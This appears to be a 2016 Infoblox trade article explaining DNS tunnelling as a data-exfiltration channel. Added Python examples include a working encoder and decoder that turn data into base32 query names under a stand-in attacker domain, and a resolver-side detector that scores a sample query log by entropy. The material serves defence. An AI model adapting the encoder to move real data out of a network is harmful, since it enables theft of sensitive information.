Stop DNS-based data exfiltration

DNS can be abused in all sorts of unconventional ways that make it the perfect back door for hackers seeking to steal sensitive data.

By Cherif Sleiman, general manager, Middle East at Infoblox. Published May 22, 2016

Theft of sensitive or regulated data and intellectual property is one of the most serious risks to an enterprise. DNS is frequently used as a pathway for data exfiltration because it is rarely inspected by the security products most organisations rely on, such as firewalls, intrusion detection systems (IDSs), and proxies: outbound port 53 is almost always permitted, and the payload of a query is a name rather than a file, so content controls never look at it.

Several high-profile data breaches have been in the news recently. Most enterprises have multiple defence mechanisms in place, such as next-generation firewalls, intrusion detection systems (IDSs), and intrusion-prevention systems (IPSs). Yet malicious actors still find a way to get the data out.

So what types of data are being stolen? They vary and may include personally identifiable information (PII), such as Emirates ID numbers in the UAE; data regulated under the Payment Card Industry Data Security Standard (PCI DSS); intellectual property that gives an organisation a competitive advantage; and other sensitive information such as credit card numbers, company financials, payroll information, and emails.

Motivations vary from hacktivism and espionage to financial wrongdoing, where the data can be easily sold for a neat profit in the underground market. When sensitive information is stolen, it causes financial and legal woes, not to mention the huge negative impact to brand. According to a Ponemon Institute study in 2015, the average consolidated cost of a data breach is US$3.8 million, which includes investigative and forensic efforts and resolution and consequences of customer defection. This is an average—recent breaches have cost victims a lot more.

Hackers can use multiple pathways to steal data, but the one that is most often left open without anyone noticing is DNS. DNS is increasingly being used for data exfiltration, either by malware-infected devices or by rogue employees. The DNS protocol, designed more than 30 years ago, is implicitly trusted and allowed through almost every perimeter, yet it was never built to resist hackers or malicious insiders.

DNS tunneling encapsulates other traffic, or arbitrary data, inside DNS queries and responses on port 53, which even next-generation firewalls often pass without inspection. For exfiltration, malware or a malicious insider on the network encodes (and usually encrypts) chunks of the data into the subdomain labels of queries for a domain whose authoritative name server the attacker controls. The infected device never needs a direct connection to the attacker: the organisation's own recursive resolver forwards each query to that server, where the chunks are decrypted and reassembled into the original information. Because every query must carry a new, never-cached name, a single file becomes thousands of lookups.
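The mechanics of the query side of such a tunnel, as an added example written for this page (it is not code from the article, and not how any particular tunnelling tool lays out its names). It assumes a hypothetical attacker domain t.example.net and a layout of one sequence label plus three payload labels per query; real tools also compress and encrypt the payload before encoding it, which this example omits:

```python
import base64
import math

# Hypothetical attacker-controlled domain whose authoritative name server
# the attacker runs; every query for a name under it reaches that server.
EXFIL_DOMAIN = "t.example.net"

MAX_LABEL = 63            # RFC 1035: one label is at most 63 octets
MAX_NAME = 253            # practical limit for a textual FQDN
LABELS_PER_QUERY = 3      # assumed layout: seq label + 3 payload labels + domain
CHUNK = MAX_LABEL * LABELS_PER_QUERY   # 189 payload characters per query


def b32_label_text(data: bytes) -> str:
    """Base32 without padding, lowercase. DNS names are case-insensitive and
    resolvers may fold case, so base64 would not survive the trip intact."""
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def b32_decode_text(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(data: bytes, domain: str = EXFIL_DOMAIN) -> list[str]:
    """Turn data into the list of query names a tunnel client would resolve.
    Each name is s<seq>.<label>.<label>.<label>.<domain>; the sequence label
    lets the receiver reorder queries that arrive out of order or through
    different recursive resolvers."""
    payload = b32_label_text(data)
    names = []
    for seq, start in enumerate(range(0, len(payload), CHUNK)):
        piece = payload[start:start + CHUNK]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        name = ".".join([f"s{seq}", *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError(f"{domain!r} leaves no room for this layout")
        names.append(name)
    return names


def decode_queries(names, domain: str = EXFIL_DOMAIN) -> bytes:
    """What the attacker's authoritative server does with its query log:
    keep names under its domain, order them by sequence, join, decode."""
    suffix = "." + domain
    pieces = {}
    for name in names:
        if not name.lower().endswith(suffix):
            continue                      # unrelated query, ignore
        labels = name[:-len(suffix)].lower().split(".")
        if not (labels[0][:1] == "s" and labels[0][1:].isdigit()):
            continue                      # not one of ours
        pieces[int(labels[0][1:])] = "".join(labels[1:])
    return b32_decode_text("".join(pieces[k] for k in sorted(pieces)))


def queries_needed(n_bytes: int) -> int:
    """How many queries a payload costs: 8 bits become 5 per base32 character."""
    chars = (n_bytes * 8 + 4) // 5
    return (chars + CHUNK - 1) // CHUNK


if __name__ == "__main__":
    # Constructed sample payload, not real data.
    secret = b"EmiratesID=784-1990-1234567-1;salary=AED 25000\n" * 20
    queries = encode_queries(secret)
    print(f"{len(secret)} bytes -> {len(queries)} queries, e.g. {queries[0][:48]}...")
    assert decode_queries(reversed(queries)) == secret
```

The arithmetic in queries_needed is the point for a defender: under 200 bytes of payload fit in one name, so even a small spreadsheet turns into a burst of long, unique lookups for one domain from one client, which is exactly the pattern a resolver-side check can look for.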

DNS is not only used for data leakage but also to move malicious code into a network: the same tunnel works in both directions, with the attacker's name server returning command-and-control instructions or payload fragments in its responses, for example in TXT records.

Don’t become the next data breach victim

DNS is the perfect enforcement point to improve your organisation's security posture. It is close to endpoints, ubiquitous, and directly in the path of DNS-based exfiltration: every tunnelled query passes through the resolver, which can log it, score it, and refuse to answer it. While DLP solutions protect against data leakage via email, web, FTP, and other vectors, most have no visibility into DNS-based exfiltration. To maximise your chances of fighting back against these data theft attempts, complement traditional data loss prevention with a DNS-based solution.
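A minimal version of the resolver-side check such a DNS-based control would run, added here as an example (not Infoblox's product logic and not code from the original article). It works over a constructed query log in an assumed "time client qname qtype" format, splits the registered domain off with a last-two-labels rule that stands in for the Public Suffix List, and flags domains that attract many distinct, long, high-entropy subdomains; the thresholds are illustrative:

```python
import math
from collections import Counter, defaultdict

# Constructed sample query log (not captured traffic). One query per line:
# "time client qname qtype". Client 10.0.0.7's queries under example.net are
# shaped like a tunnel client's: long random-looking labels, TXT lookups, and
# a never-before-seen name each time so no cache can answer them.
SAMPLE_LOG = """\
09:00:01 10.0.0.5 www.microsoft.com A
09:00:01 10.0.0.5 login.live.com A
09:00:02 10.0.0.5 static.cdn.example.com A
09:00:02 10.0.0.5 mail.example.com MX
09:00:03 10.0.0.6 d3k2j7x9q4w1.cloudfront.net A
09:00:04 10.0.0.7 www.google.com A
09:00:04 10.0.0.7 kjv3m7a2qx5zlhd4n6bgw2ey7tcrz3s4umfpq6ab2ndh5kzx7w3tlq2c4rgb.t.example.net TXT
09:00:04 10.0.0.7 qz4mn7ewb2xd5vhk3ragc6tlp2y7fu4sj5nwe3ombq6xh2dk5vz7ar3tcgl4.t.example.net TXT
09:00:05 10.0.0.7 h5bw2tq7zx3ndm4rkl6ey2vs5pa3cfu7gj4ozq6wtbn2hx5dr3ly7mek4av.t.example.net TXT
09:00:05 10.0.0.7 u6rc3xqy2lmt5nkz7wdh4ba2fje6gvs3poq5xt7rcw2nhy4lzd6mke3avb5.t.example.net A
09:00:06 10.0.0.7 y7dkq2wzn4hb6tx3rlv5acm2pju7fg4sez6xqt3wnd5hk2bro4lvy6ma7cu.t.example.net TXT
09:00:06 10.0.0.7 p3vnx6ktz2gaw5hrd7lqy4mbc2uje6szf3xto5wkh2dn4vry7lab6qme3c.t.example.net A
"""


def split_name(qname: str) -> tuple[str, str]:
    """Return (registered domain, subdomain). Assumption for this example: the
    registered domain is the last two labels. Production code should use the
    Public Suffix List, since co.uk, com.au and the like break this rule."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def shannon_entropy(text: str) -> float:
    """Bits per character of text's empirical symbol distribution. Hostnames
    made of words score around 2-3; base32/base64 chunks score above 4."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def parse_log(text: str) -> list:
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        _time, client, qname, qtype = line.split()
        records.append((client, qname, qtype.upper()))
    return records


def score_domains(records, min_unique=5, min_entropy=3.5, long_sub=40) -> dict:
    """Aggregate per registered domain and flag those whose subdomains look like
    a data channel: many distinct, long, high-entropy names. TXT/NULL lookups
    are reported as supporting evidence, not as a trigger on their own."""
    per_domain = defaultdict(lambda: {"subs": set(), "clients": set(), "txt_null": 0})
    for client, qname, qtype in records:
        domain, sub = split_name(qname)
        d = per_domain[domain]
        if sub:
            d["subs"].add(sub)
        d["clients"].add(client)
        if qtype in ("TXT", "NULL"):
            d["txt_null"] += 1

    findings = {}
    for domain, d in per_domain.items():
        subs = sorted(d["subs"])
        if len(subs) < min_unique:
            continue                      # too few distinct names to judge
        mean_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        mean_len = sum(len(s) for s in subs) / len(subs)
        reasons = []
        if mean_entropy >= min_entropy:
            reasons.append(f"mean subdomain entropy {mean_entropy:.2f} bits/char")
        if mean_len >= long_sub:
            reasons.append(f"mean subdomain length {mean_len:.0f} chars")
        if reasons:
            if d["txt_null"]:
                reasons.append(f"{d['txt_null']} TXT/NULL queries")
            findings[domain] = {
                "unique_subdomains": len(subs),
                "clients": sorted(d["clients"]),
                "reasons": reasons,
            }
    return findings


if __name__ == "__main__":
    for domain, info in score_domains(parse_log(SAMPLE_LOG)).items():
        print(domain, info["clients"], info["unique_subdomains"], "; ".join(info["reasons"]))
```

Two caveats a practitioner will hit immediately: CDNs, anti-virus signature lookups and some telemetry services legitimately generate many random-looking subdomains, so a check like this needs an allowlist of known domains and should be tuned on the organisation's own baseline; and the per-client attribution only works because the resolver is close to the endpoints, which is the property the paragraph above is arguing for.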
